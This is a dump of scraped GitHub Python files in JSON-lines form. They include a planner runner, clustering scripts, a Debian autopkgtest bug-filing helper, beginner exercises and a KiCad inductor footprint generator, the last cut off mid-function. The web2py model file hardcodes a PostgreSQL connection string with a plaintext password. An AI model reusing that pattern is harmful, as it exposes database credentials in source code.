content')\n\n\nclass TestWaitNode(TestCase):\n\n    def test_wait_node_renders_as_empty_script(self):\n        self.assertHTMLEqual(\n            Wait().render(template.Context({})),\n            '<script></script>'\n        )\n\n\nclass TestTemplateTags(TestCase):\n\n    def test_runlabjs_output_includes_runQueue(self):\n        t = template.Template('{% load labjs %}{% runlabjs %}')\n        self.assertIn('runQueue', t.render(template.Context({})))\n","repo_name":"ashwoods/django-labjs","sub_path":"labJS/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"5695245108","text":"\"\"\"Prints distanceutils version when executed.\"\"\"\n\nimport argparse\n\n\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('--list-categories', action='store_true',\n                   help=\"List all class categories.\")\ngroup.add_argument('--list-classes', nargs='?', const='all',\n                   metavar='CATEGORY|\"all\"',\n                   help=\"List classes of specified category or all categories.\")\ngroup.add_argument('--list-fragment', metavar='TAG',\n                   help=\"List information of the fragment with specified tag.\")\nargs = parser.parse_args()\n\nif args.list_categories:\n    from . import DefaultClasses\n    DefaultClasses.print_listing(print_classes=False)\nelif args.list_classes is not None:\n    category = args.list_classes\n    from . 
import DefaultClasses\n    if category == 'all':\n        DefaultClasses.print_listing()\n    else:\n        try:\n            coll = DefaultClasses.get_category(category)\n        except KeyError:\n            print(f\"Category {category!r} doesn't exist\")\n            exit(1)\n        else:\n            coll.print_listing()\nelif args.list_fragment is not None:\n    from .classes import TagError, DefaultClasses\n    tag = args.list_fragment\n    try:\n        DefaultClasses.fragments.print_listing(tag=tag)\n    except TagError:\n        print(f\"Fragment class with tag {tag!r} doesn't exist\")\n        exit(1)\nelse:\n    from . import __version__\n    print(f\"distanceutils version {__version__}\")\n\n\n# vim:set sw=4 ts=8 sts=4 et:\n","repo_name":"ferreum/distanceutils","sub_path":"distance/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"73686858408","text":"# Create a program that reads several numbers and puts them in a list.\n# After that, create two extra lists that hold only the even values and the odd values entered, respectively.\n# At the end, show the contents of the three lists generated.\n\n\nlista_geral = []\nlista_impares = []\nlista_pares = []\nwhile True:\n    lista_geral.append(int(input('Enter a number: ')))\n    ask = input('Do you want to continue? [Y/N]').upper()\n    if ask == 'N':\n        break\n\nfor x in lista_geral:\n    if x % 2 == 0:\n        lista_pares.append(x)\n    else:\n        lista_impares.append(x)\n\nprint(f'The full list is {lista_geral}')\nprint(f'Your list of even numbers is {lista_pares}')\nprint(f'Your list of odd numbers is {lista_impares}')","repo_name":"hectorrobertoantunes/exercicios","sub_path":"ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11330432026","text":"#!/usr/bin/env python3\n\nimport sys, getopt\n\nimport signal\nimport os\nimport re\nimport subprocess\n\nimport data_util\nimport pickle\nimport parse\nimport math\nfrom correlation import delog_predict\n\nPddl_problem_ = \"../domains/dom_APE/Custom.pddl\" # (str) Default problem name, extension needed\nregr_name_full_ = data_util.regr_name_full_\n\nrun_wd = data_util.domains_wd\t\t\t# (str) Working directory\nout_wd = data_util.out_wd\n\nengine_path = data_util.engine_path\n\n\nPlan_Engine = 'enhsp' \t\t\t# (str) Define the planning engine to be used, choose between 'ff' or 'enhsp'\nPddl_domain_ = data_util.domain_name_full_ # (str) Name of pddl domain file\ndelta = data_util.delta_val\n\noutput_keywords = data_util.output_keywords # list of (str): keywords for relevant outputs\n \ncwd = os.getcwd()\n\ndef run(domain_full, problem_full, g_val, h_val, run_output_file, run_time=None, show_output=False):\n    \"\"\"\n    Function that calls enhsp-20 to plan over a (domain,problem)\n    \n    Some parameters are passed to the run, in order to tweak\n    its behaviour. 
The results obtained, in terms of the\n    metrics presented in 'output_keywords', are saved in a\n    text file.\n    \n    Args:\n        domain_full (str): path/to/domain_file\n        problem_full (str): path/to/problem_file\n        g_val (float): weight of g() function in A*\n        h_val (float): weight of h() function in A*\n        run_output_file (file):\n                    open file to write the trimmed\n                    results to\n        run_time (int): timeout for the planner execution.\n                    The planner will be stopped if no\n                    solution is found in time.\n                    (default None -> no timeout)\n        show_output (bool): whether to display the enhsp full\n                    output on console or not at the\n                    end of the run.\n                    (default False)\n    \n    Returns:\n        flag (int): encodes the success of the run\n    \"\"\"\n\n    hw_flag = data_util.hw_flag\n    gw_flag = data_util.gw_flag\n    delta_val_flag = data_util.delta_val_flag\n    delta_exec_flag = data_util.delta_exec_flag\n    frm_result = \"\"\n    flag = 0\n    gh_str = \"H_VALUE: \" + str(h_val) + \"\\nG_VALUE: \" + str(g_val) + \"\\n\"\n    run_output_file.write(gh_str)\n    \n    print(\"Running \" + problem_full + \" gw: \" + str(g_val) + \" hw: \" + str(h_val))\n    with subprocess.Popen([engine_path, \"-o\", domain_full, \"-f\", problem_full,\n                           hw_flag, str(h_val), gw_flag, str(g_val),\n                           delta_val_flag, str(delta), delta_exec_flag, str(delta)\n                           ], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, preexec_fn=os.setsid) as result:\n        try:\n            res, err = result.communicate(timeout=run_time)\n            if result.returncode:\n                raise subprocess.CalledProcessError(cmd=result.args, returncode=result.returncode)\n        \n        except (subprocess.TimeoutExpired):\n            ### A group of processes is generated in order to kill the java subprocesses\n            ### spawned in turn by enhsp (they'd remain zombies and eat computational resources\n            ### otherwise in case of a run interrupted by timeout\n            group_pid = os.getpgid(result.pid)\n            os.killpg(group_pid, signal.SIGINT)\n            ###\n            fail_str = 'Solution not found for ' + problem_full + ' in ' + str(run_time) + ' seconds'\n            print(fail_str)\n        \n        except (subprocess.CalledProcessError):\n            fail_str = 'Error found during the solution of ' + problem_full\n            print(fail_str)\n            print(err.replace('\\\\n', '\\n'))\n        \n        else:\n            flag = 1\n            frm_result = res.replace('\\\\n','\\n')\n            frm_result = frm_result.replace(data_util.duration_alias, 'Duration')\n            frm_result = trim_output(frm_result)\n        \n        if show_output:\n            print(res.replace('\\\\n','\\n'))\n    \n    run_output_file.write(\"SUCCESS: \" + str(flag) + \"\\n\")\n    run_output_file.write(frm_result)\n    \n    run_output_file.write(\"\\n\\n### ------------------ ###\\n\\n\")\n    return flag\n    \ndef trim_output(tot_out):\n    \"\"\"\n    This function keeps only the metrics we are interested in\n    from the enhsp output log\n    \n    Args:\n        tot_out (str): enhsp whole log of a successful run\n    \n    Returns:\n        trim_out (str): trimmed log presenting only the metrics\n                        of interest (those in 'output_keywords')\n    \"\"\"\n    \n    trim_out = \"\"\n    \n    for k in output_keywords:\n        start = tot_out.rfind(k)\n        # rfind simply retrieves the last time the string appeared\n        # necessary since States Evaluated appears more than once\n        # in different contexts\n        end = tot_out.find(\"\\n\", start, -1) + 1\n        trim_out = trim_out + tot_out[start:end]\n    \n    return trim_out\n    \ndef get_best_hg(regr_dict, problem_filename):\n    \"\"\"\n    This function retrieves the best gw and hw based on\n    a problem configuration\n    \n    Information such as the number of waiters and the drink\n    distribution was used to train a sequence of\n    LinearRegression models on two solution parameters,\n    'Duration' and 'Search Time', in order to 
predict\n    the quality of the solution expected for each of\n    the (hw,gw) couples the training was performed on.\n    The (hw,gw) couple yielding the best expected\n    performance (the lowest weighted sum of the two predicted\n    metrics) is selected.\n    * Notice that the predicted values are actually the\n    log() of those two solution parameters.\n    \n    Args:\n        regr_dict (dict):\n                    collection of all LinearRegression\n                    models trained, indexed as\n                    (hw,gw)x(goal_metric)\n        problem_filename (str):\n                    path/to/problem_file to run\n    \n    Returns:\n        [hw] (list(float)):\n                    optimal predicted h weight (returned as\n                    a singleton list for compatibility)\n        [gw] (list(float)):\n                    optimal predicted g weight (returned as\n                    a singleton list for compatibility)\n    \"\"\"\n    \n    best_out = float('inf')\n    ## Parse problem file\n    n_waiters, drink4table, hot4table = parse.parse_problem(problem_filename)\n    \n    tot, avg_x, avg_y, eig_1, eig_2 = data_util.avg_drink_pos(drink4table)\n    hot_tot, hot_avg_x, hot_avg_y, hot_eig_1, hot_eig_2 = data_util.avg_drink_pos(hot4table)\n    \n    params = [n_waiters, tot, avg_x, avg_y, eig_1, eig_2, hot_tot, hot_avg_x, hot_avg_y, hot_eig_1, hot_eig_2]\n    ## Apply the linear regression coefficients to estimate the Y function for all (h,g) values\n    \n    ## load already explored drink configurations\n    goals = data_util.regr_goals_\n    Q_weights = data_util.Q_weights_\n    \n    pred_goals = {}\n    \n    for hg_key, regr_list in regr_dict.items():\n        exp_out = list()\n        for goal, regr in regr_list.items():\n            prediction = regr.predict([params])\n            pred_goals[goal] = round(math.exp(prediction))\n            exp_out.append(Q_weights[goal]*prediction)\n            ## Log scale chosen\n            # exp_out.append(Q_weights[goal]*pred_goals[goal])\n        \n        Q_fact = sum(exp_out)/sum(Q_weights.values())\n        print(\"[H: {:6}\\tG: {:6}]\\t->Q: {}\\t{}\".format(hg_key[0], hg_key[1], Q_fact, pred_goals))\n        \n        if Q_fact < best_out:\n            best_out = Q_fact\n            h_val = hg_key[0]\n            g_val = hg_key[1]\n    \n    print(\"Chosen [H: {}\\tG: {}]\".format(h_val, g_val))\n    return [h_val], [g_val]\n\ndef main(argv):\n    \"\"\"\n    Script to run a (domain, problem) file using the enhsp solver.\n    \n    It's possible to run them using the couple of (hw,gw)\n    autonomously predicted to give the best results\n    (among a finite list of such couples) thanks to a small\n    machine learning model.\n    \"\"\"\n    \n    usage = (\"usage: python3 \" + argv[0] + \"\\n\" +\n             \"(default values will be used in case options are not provided)\\n\" +\n             \"\\t-f, --problem \\tPDDL problem file\\n\" +\n             \"\\t-n, --output-path \\tpath and name of the output file\\n\" +\n             \"\\t-o, --domain \\tPDDL domain file\\n\" +\n             \"\\t-p, --path \\tpath to directory of PDDL files\\n\" +\n             \"\\t-t, --time \\tmaximum run time of each instance, in seconds\\n\" +\n             \"\\t-s, --silence\\t\\tdon't print output of each run on the terminal\\n\" +\n             \"\\t-M, --machine-learning \\t\\tautomatically find close-to-optimal [hw,gw]\\n\"+\n             \"\\t\\t\\t\\t\\t values with trained Linear Regression model\\n\" +\n             \"\\t--gw \\t\\tthe list of gw values as [gw1,gw2,gw3,...] (list)\\n\" +\n             \"\\t--hw \\t\\tthe list of hw values as [hw1,hw2,hw3,...] 
(list)\\n\" +\n             \"\\t-h, --help\\t\\tdisplay this help\\n\"\n             )\n    usr_wd = \"\"\n    Pddl_domain = Pddl_domain_\n    Pddl_problem = Pddl_problem_\n    output_string = \"\"\n    run_time = None ## None won't trigger a timeout\n    ML = False\n    show_output = True\n    g_values = [1.0]\n    h_values = [1.0]\n    \n    try:\n        opts, args = getopt.getopt(argv[1:], \"hf:o:p:n:t:Ms\",\n                                   [\"help\", \"problem=\", \"domain=\", \"path=\", \"output-path=\", \"time=\",\n                                    \"gw=\", \"hw=\", \"machine-learning\", \"silence\"])\n    except getopt.GetoptError:\n        print(usage)\n        sys.exit(1)\n    \n    \n    if (\"-M\", '') in opts or (\"--machine-learning\", '') in opts:\n        ML = True\n    \n    for opt, arg in opts:\n        if opt in (\"-h\", \"--help\"):\n            print(usage)\n            sys.exit()\n        elif opt in (\"-f\", \"--problem\"):\n            Pddl_problem = arg\n        elif opt in (\"-o\", \"--domain\"):\n            Pddl_domain = arg\n        elif opt in (\"-p\", \"--path\"):\n            usr_wd = arg+\"/\"\n        elif opt in (\"-n\", \"--output-path\"):\n            output_string = arg\n        elif opt in (\"-t\", \"--time\"):\n            run_time = int(arg)\n        elif opt in (\"-s\", \"--silence\"):\n            show_output = False\n        elif not ML and opt in (\"--gw\") and arg[0] == '[' and arg[-1] == ']':\n            gw = re.findall(\"\\d+\\.?\\d*\", arg)\n            g_values = list()\n            try:\n                for gg in gw:\n                    g_values.append(float(gg))\n            except ValueError:\n                print(\"g values should be float\")\n                sys.exit()\n        elif not ML and opt in (\"--hw\") and arg[0] == '[' and arg[-1] == ']':\n            hw = re.findall(\"\\d+\\.?\\d*\", arg)\n            h_values = list()\n            try:\n                for hh in hw:\n                    h_values.append(float(hh))\n            except ValueError:\n                print(\"h values should be float\")\n                sys.exit()\n    \n    domain_string = usr_wd + Pddl_domain\n    problem_string = usr_wd + Pddl_problem\n    \n    problem_trim_name = Pddl_problem[Pddl_problem.rfind(\"/\")+1:Pddl_problem.rfind(\".pddl\")]\n    \n    if not output_string:\n        output_string = \"output_\" + problem_trim_name + \".txt\"\n    \n    \n    if ML:\n        ## load saved Linear Regression\n        try:\n            with open(regr_name_full_, 'rb') as f:\n                regr_dict = pickle.load(f)\n            h_values, g_values = get_best_hg(regr_dict, problem_string)\n        \n        except FileNotFoundError:\n            print(\"No regression model found at {}, default hw and gw will be used\".format(regr_name_full_))\n            print(\"To generate it run first\\n\" +\n                  \"\\tpython3 correlation.py -c \\n\")\n            \n            h_values = [1.0]\n            g_values = [1.0]  \n    \n    with open(cwd + \"/\" + out_wd + \"/\"+ output_string, \"w\") as run_output_file:\n        for g_value in g_values:\n            for h_value in h_values:\n                if h_value == g_value != 1:\n                    # scaling h and g by the same factor gives the same search as h = g = 1\n                    continue\n                run_script = run(domain_string, problem_string, g_value, h_value,\n                                 run_output_file, run_time=run_time, show_output = show_output)\n                res_run_str = problem_trim_name + \" with hw = \" + str(h_value) + \" gw = \" + str(g_value)\n                if run_script:\n                    print(\"Successful run \" + res_run_str)\n                else:\n                    print(\"Unsuccessful run \" + res_run_str)\n    \n\nif __name__ == '__main__':\n    main(sys.argv)\n","repo_name":"hypothe/AI4RO2_E","sub_path":"script/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":12715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39055920333","text":"#!/usr/bin/python3\n# 8-multiple_returns.py\n\ndef multiple_returns(sentence):\n    \"\"\"get length of sentence and first character\"\"\"\n    first_char = None\n    length = len(sentence)\n    if length > 0:\n        first_char = sentence[0]\n    return length, 
first_char\n","repo_name":"stephenoba/alx-higher_level_programming","sub_path":"0x03-python-data_structures/8-multiple_returns.py","file_name":"8-multiple_returns.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28546176412","text":"from sklearn import datasets\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.mixture import GaussianMixture\r\nfrom sklearn.decomposition import PCA, FastICA\r\nfrom sklearn.random_projection import GaussianRandomProjection\r\nfrom sklearn.metrics import silhouette_score\r\nfrom sklearn.metrics.cluster import completeness_score, homogeneity_score\r\nfrom sklearn.model_selection import learning_curve\r\nfrom sklearn import preprocessing\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport csv\r\nfrom getData import getData\r\nimport utils\r\nimport sys, getopt\r\nimport time\r\nfrom clusters import run_Kmeans, plot_Kmeans, overplot_Kmeans, run_GMM, plot_GMM, overplot_GMM, plot_clusters, p1_Keamns, print_mertrics\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\tbaseline = False\r\n\tsingle = False\r\n\tprintFlg = False\r\n\tALGS = []\r\n\tCLUSTERS = []\r\n\r\n\tfor i in range(len(sys.argv)):\r\n\t\tif sys.argv[i] == '-single':\r\n\t\t\tsingle = True\r\n\t\tif sys.argv[i] == '-baseline':\r\n\t\t\tbaseline = True\r\n\t\tif sys.argv[i] == '-c':\r\n\t\t\tif sys.argv[i+1] == 'all':\r\n\t\t\t\tCLUSTERS = [0, 1, 2]\r\n\t\t\tif sys.argv[i+1] == 'kmeans':\r\n\t\t\t\tCLUSTERS = [0]\r\n\t\t\telif sys.argv[i+1] == 'gmm':\r\n\t\t\t\tCLUSTERS = [1]\r\n\t\tif sys.argv[i] == '-d':\r\n\t\t\tif sys.argv[i+1] == 'all':\r\n\t\t\t\tDATASETS = [0, 1]\r\n\t\t\tif sys.argv[i+1] == 'wine':\r\n\t\t\t\tDATASETS = [0]\r\n\t\t\telif sys.argv[i+1] == 'cancer':\r\n\t\t\t\tDATASETS = [1]\r\n\t\tif sys.argv[i] == '-print_metrics':\r\n\t\t\tprintFlg = True\r\n\r\n\r\n\r\n\r\n\t# get data\r\n\tx_wine, y_wine = getData.wineData()\r\n\tx_wine = preprocessing.scale(x_wine)\r\n\tfeature_space_wine = np.array(range(2,np.shape(x_wine)[1]+1))\r\n\r\n\tx_cancer, y_cancer = getData.cancerData()\r\n\tx_cancer = preprocessing.scale(x_cancer)\r\n\tfeature_space_cancer = np.array(range(2,np.shape(x_cancer)[1]+1))\r\n\r\n\tfor clust in CLUSTERS:\r\n\t\tif clust == 0:\r\n\t\t\tfor dat in DATASETS:\r\n\t\t\t\tif dat == 0:\r\n\t\t\t\t\tp1_Keamns(x_wine, y_wine, 'KMeans Wine Analysis', 'KMeans_Wine_Analysis', \r\n\t\t\t\t\t\tkRange=feature_space_wine, verbose=False)\r\n\t\t\t\t\tprint_mertrics(x_wine, y_wine, [7], alg='Kmeans')\r\n\r\n\t\t\t\tif dat == 1:\r\n\t\t\t\t\tp1_Keamns(x_cancer, y_cancer, 'KMeans Cancer Analysis', 'KMeans_Cancer_Analysis', \r\n\t\t\t\t\t\tkRange=feature_space_cancer, verbose=False)\r\n\t\tif clust == 1:\r\n\t\t\tfor dat in DATASETS:\r\n\t\t\t\tif dat == 0:\r\n\t\t\t\t\tgmmOut = run_GMM(x_wine, y_wine, kRange=feature_space_wine, verbose=True)\r\n\t\t\t\t\tgmm, n, aic_scores, bic_scores = gmmOut\r\n\t\t\t\t\tplot_GMM(n, aic_scores, bic_scores, 'GMM Wine Analysis', 'GMMs_Wine_Analysis')\r\n\r\n\t\t\t\tif dat == 1:\r\n\t\t\t\t\tgmmOut = run_GMM(x_cancer, y_cancer, kRange=feature_space_cancer, verbose=True)\r\n\t\t\t\t\tgmm, n, aic_scores, bic_scores = gmmOut\r\n\t\t\t\t\tplot_GMM(n, aic_scores, bic_scores, 'GMM Cancer Analysis', 'GMMs_Cancer_Analysis')\r\n\r\n\r\n\tif printFlg:\r\n\t\t# print_mertrics(x_wine, y_wine, [feature_space_wine[-1]], alg='Kmeans')\r\n\t\tprint_mertrics(x_wine, y_wine, [7], alg='Kmeans')\r\n\t\t# 
print_mertrics(x_cancer, y_cancer, [feature_space_cancer[-1]], alg='Kmeans')\r\n\t\tprint_mertrics(x_cancer, y_cancer, [6], alg='Kmeans')\r\n\r\n\t\t# print_mertrics(x_wine, y_wine, [feature_space_wine[-1]], alg='GMM')\r\n\t\tprint_mertrics(x_wine, y_wine, [7], alg='GMM')\r\n\t\t# print_mertrics(x_cancer, y_cancer, [feature_space_cancer[-1]], alg='GMM')\r\n\t\tprint_mertrics(x_cancer, y_cancer, [7], alg='GMM')","repo_name":"ajscott0613/CS7641_ML_P3","sub_path":"runClusters.py","file_name":"runClusters.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71567455848","text":"# -*- coding: utf-8 -*-\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\n\n\ndb = DAL(\"postgres://postgres:Please123@localhost/joseph\",\n pool_size=10,\n check_reserved=['postgres'],)\n # migrate=True, fake_migrate=True, lazy_tables=True)\n\ndb.define_table('image',\n Field('title', unique=True),\n Field('file', 'upload'),\n format = '%(title)s')\n\ndb.define_table('post',\n Field('image_id', 'reference image'),\n Field('author'),\n Field('email'),\n Field('body', 'text'))\n\n\n# db.define_table('grids',\n# Field('image_id'),\n# Field('author'),\n# Field('email'),\n# Field('body', 'text'))\n\ndb.define_table('simap_grids',\n Field('name', 'string', unique=True),\n Field('description', 'text'), \n Field('abbreviation', 'string'),\n Field('filename', 'string'),\n Field('source_dirs', 'list:string'),\n Field('sha1', 'string'),\n Field('project', 'string'), \n Field('origin', 'string'), # This will be spatial type Point\n Field('delta', 'string'), # This will be spatial type Point\n Field('extent', 'string'), # This will be spatial type Polygon\n Field('habitat_id'), # This will be a foreign key to habitats.id\n Field('scenario_id'), # This will be a foreign key to scenarios.id\n format='%(name)s'\n )\n\n\n\n\ndb.image.title.requires = IS_NOT_IN_DB(db, db.image.title)\n\ndb.post.image_id.requires = IS_IN_DB(db, db.image.id, '%(title)s')\ndb.post.author.requires = IS_NOT_EMPTY()\ndb.post.email.requires = IS_EMAIL()\ndb.post.body.requires = IS_NOT_EMPTY()\ndb.post.image_id.writable = db.post.image_id.readable = False\n\n\n## configure auth policy\nauth = Auth(db)\nauth.define_tables(username=True)\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True","repo_name":"gjcoombes/joseph","sub_path":"models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36949241412","text":"import argparse\nimport pathlib\nimport subprocess\nimport sys\n\nimport debian.deb822 as d822\nfrom rich.console import Console\nfrom rich.progress import track\n\nconsole = Console()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--package', default=None)\nparser.add_argument('--bts-user', default=None)\nparser.add_argument('--bts-tag', default=None)\nparser.add_argument('--debemail', default=\"YOUR NAME \")\n\nargs = parser.parse_args()\nif args.package is None:\n console.print(\"[red]ERROR: please specify the package to check\\n\")\n parser.print_help(sys.stderr)\n sys.exit(1)\nif args.bts_user is None:\n console.print(\"[red]ERROR: please specify the BTS username to use\\n\")\n parser.print_help(sys.stderr)\n sys.exit(1)\nif args.bts_tag is None:\n args.bts_tag = 
f'missing-adt-{args.package}'\n\nMASSBUG_BODY = f\"\"\"Dear maintainer,\n#PACKAGE# has a package relationship with {args.package} (either a\nDepends/Recommends/Suggests or a build-time dependency) but doesn't define any\nautopkgtests.\n\nAutopkgtests allow for automation to verify reverse-dependencies are still\nworking and/or building properly after a package is uploaded, and are helpful\nin preventing a package from migrating to testing if they break other packages.\n\nFor these reasons, please add \"meaningful\" autopkgtests to this package, which\nusually means running the upstream unittests.\n\nFurther information can be found at:\n\n * https://manpages.debian.org/unstable/autopkgtest/autopkgtest.1.en.html\n * https://manpages.debian.org/unstable/dh-python/pybuild-autopkgtest.1.en.html\n\n\nThanks!\n\nPackage list generated by:\n\n https://github.com/sandrotosi/debian-tools/blob/master/find_rdeps_without_autopkgtests.py\n\"\"\"\n\n# it's quite hard to find all the source and binary packages having a relationship with PKG, so take the `apt-rdepends` approximation here\nrdeps = subprocess.run(['apt-rdepends', '-r', '--follow=Obsoletes', args.package], stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.decode()\nrdeps = [x.split()[2] for x in rdeps.splitlines() if x.startswith('  Reverse Depends')]\n\nok, ko = set(), set()\n\nfor rdep in track(rdeps, description=\"Processing rdeps...\"):\n    aptcache = subprocess.run(['apt-cache', 'showsrc', rdep], stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.decode()\n    data = d822.Deb822(aptcache)\n    if 'Testsuite' in data:\n        ok.add(data['Package'])\n    else:\n        ko.add(data['Package'])\n\nconsole.print(\"Summary:\")\nconsole.print(f\"  Total rdeps processed: {len(rdeps)}\")\nconsole.print(f\"  Total rdeps with autopkgtests: [green]{len(ok)}\")\nconsole.print(f\"  Total rdeps [underline]without[/underline] autopkgtests: [red]{len(ko)}\")\n\n\nconsole.print(\"rdeps with autopkgtests\")\nfor pkg in sorted(ok):\n    console.print(f\"  {pkg}\", style=\"green\")\nconsole.print(\"rdeps WITHOUT autopkgtests\")\nfor pkg in sorted(ko):\n    console.print(f\"  {pkg}\", style=\"red\")\n\npkgs_filename = f'{args.package}_pkgs'\nbody_filename = f'{args.package}_body'\n\npathlib.Path(pkgs_filename).open('w').write('\\n'.join(sorted(ko)))\npathlib.Path(body_filename).open('w').write(MASSBUG_BODY)\n\nconsole.print(\"\\nA set of 2 files has been generated in the current directory:\")\nconsole.print(f\" - the bug report template body: {body_filename}\")\nconsole.print(f\" - the packages list: {pkgs_filename}\\n\")\n\nconsole.print(\"You can now run `mass-bug` to file the bug reports:\\n\")\nprint(f' DEBEMAIL=\"{args.debemail}\" mass-bug --subject=\"please add autopkgtests (to add coverage for {args.package})\" --user={args.bts_user} --usertags={args.bts_tag} --source --no-wrap --severity=normal {body_filename} {pkgs_filename}')\nconsole.print(\"\\nNOTE: to actually submit the reports, append `--send` to the command above\")\n","repo_name":"sandrotosi/debian-tools","sub_path":"find_rdeps_without_autopkgtests.py","file_name":"find_rdeps_without_autopkgtests.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39951781744","text":"class Scikic:\n\n    def __init__(self):\n        # Single layer Planar spiral coil inductor calculator\n        # See: the square planar inductor at\n        # http://www.circuits.dk/calculator_planar_coil_inductor.htm\n        #\n        # Note: units of length are millimetres (mm)\n        
#\n # n, number of turns or windings, N>=2\n # dint, inner dimension\n # s, gap or spacing between windings\n # w, conductor width\n # h, conductor height or thickness, hidden in Figure 1 of the paper.\n\n # dimension associated with the via: Size X: 0.6, Size y: 0.6; Hole shape = circular, Hole Size: 0.3\n # See: https://jlcpcb.com/capabilities/Capabilities\n self.via_hole_diam = 0.3 # minimum via hole size is 0.3mm\n self.via_size_x = 0.6 # minimum Via diameter is 0.6mm\n self.via_size_y = 0.6 # minimum Via diameter is 0.6mm\n # Fasthenry parameters\n self.nwinc: int = 1 # see Fasthenry manual\n self.nhinc: int = 1\n\n self.parseCommandLineArgs()\n\n def getXYPositions(self):\n # din = inner length\n # w = track width\n # s = spacing between tracks\n # number of turns\n\n din = self.din\n w = self.w\n s = self.s\n n = self.n\n\n x = [0 for _ in range(4 * n)]\n\n for i in range(len(x)):\n dv, md = divmod(i, 4)\n if md == 3:\n x[i] = -(din / 2 + dv * (w + s) + w / 2)\n x[i - 2] = - x[i]\n if md == 0:\n x[i] = (w + s) / 2\n y = x[1:] + [0]\n\n return x, y\n\n def getLengths(self):\n\n din = self.din\n w = self.w\n s = self.s\n n = self.n\n l = [0 for _ in range(int((4 * n) / 2))]\n count = 1\n for i in range(len(l)):\n l[i] = din + count * w + (count - 2) * (s)\n count += 1\n\n return l\n\n def getStartEndCoords(self):\n\n din = self.din\n w = self.w\n s = self.s\n n = self.n\n x, y = self.getXYPositions()\n x0y0 = []\n for i in range(len(x)):\n x0y0.append(par.Point(x[i], y[i]))\n x0y0[i].slide_xy(-(w + s) / 4.0, 0.0)\n nodes = []\n base_width = din + w - s\n widths = []\n nodes = []\n for i in range(2 * n):\n widths.append(base_width + i * (w + s))\n nodes = []\n for i in range(0, len(x0y0), 2):\n # print('width of side {:>2} is {:.3f} @ ({:.3f},{:.3f})]'.format(i+1,widths[int(i/2)], x0y0[i].x, x0y0[i].y))\n p = x0y0[i].clone()\n p.slide_xy(-widths[int(i / 2)] / 2 + w / 2, 0)\n q = x0y0[i].clone()\n q.slide_xy(widths[int(i / 2)] / 2 - w / 2, 0)\n nodes.append(p)\n nodes.append(q)\n for i in range(2, len(nodes), 4):\n tmp = nodes[i]\n nodes[i] = nodes[i + 1]\n nodes[i + 1] = tmp\n\n return nodes\n\n def printNodes(self, nodes):\n print('nodes:')\n for i in range(len(nodes)):\n print('n{:>2}=({:>6.3f},{:>6.3f})'.format(i, nodes[i].x, nodes[i].y))\n\n def getEndCoords(self, length, x0):\n\n w = self.w\n return (x0 - length / 2 + w / 2), (x0 + length / 2 - w / 2)\n\n def getWidths(self, lengths, trackWidth):\n widths = []\n\n for i in range(len(lengths)):\n widths.append(lengths[i])\n widths.append(trackWidth)\n\n return widths\n\n def getHeights(self, widths):\n return widths[1:] + [widths[-2]]\n\n def formKiCadFootprint(self):\n\n din = self.din\n trackWidth = self.w\n s = self.s\n n = self.n\n via_size = self.via_size_x\n\n x, y = self.getXYPositions()\n l = self.getLengths()\n widths = self.getWidths(l, trackWidth)\n heights = self.getHeights(widths)\n footprint = textwrap.dedent(\"\"\"\\\n\t\t\t(module mohan (layer F.Cu) (tedit 5E1D9573)\n\t\t\t (fp_text reference REF** (at 0 0) (layer F.SilkS)\n\t\t\t\t(effects (font (size 1 1) (thickness 0.15)))\n\t\t\t )\n\t\t\t (fp_text value mohan (at 0 0) (layer F.Fab)\n\t\t\t\t(effects (font (size 1 1) (thickness 0.15)))\n\t\t\t )\t\t\t\n\t\t\"\"\")\n\n line_txt = ' (pad {} smd rect (at {:.3f} {:.3f}) (size {:.3f} {:.3f}) (layers F.Cu F.Paste F.Mask))\\n'\n\n for i in range(len(x)):\n footprint += line_txt.format(i + 3, x[i], y[i], widths[i], heights[i])\n\n l1 = din - s + trackWidth\n p = x[0] - l1 / 2\n q = -(din / 2 + n * trackWidth + (n - 1) * 
